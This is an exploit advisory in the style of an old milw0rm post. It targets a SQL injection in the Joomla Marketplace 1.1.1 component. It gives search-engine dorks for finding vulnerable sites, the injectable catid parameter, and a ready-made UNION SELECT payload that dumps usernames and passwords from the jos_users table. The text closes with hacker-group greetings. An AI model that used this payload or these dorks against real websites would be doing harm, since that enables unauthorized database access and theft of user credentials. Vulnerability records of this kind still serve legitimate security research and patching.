############################################################################ # Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit # # # # AUTHOR:SoSo H H (Iraqi-Cracker) # # # # Tested on: Markplace Version 1.1.1 and 1.1.1-pl1 # # # # Dork:"Marketplace Version 1.1.1" # # "Marketplace Version 1.1.1-pl1" # # inurl:index.php?option=com_marketplace # ############################################################################ # Exploit in: # # index.php?option=com_marketplace&page=show_category&catid=(SQL) # # # # Example: # # # # (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*# ############################################################################ # Greetz: # # L!0N,El Mariachi,My Sweet,Shadow Administrator,TrYaG Team # # and All 7shasha Boards Members! # ############################################################################ # milw0rm.com [2008-02-03]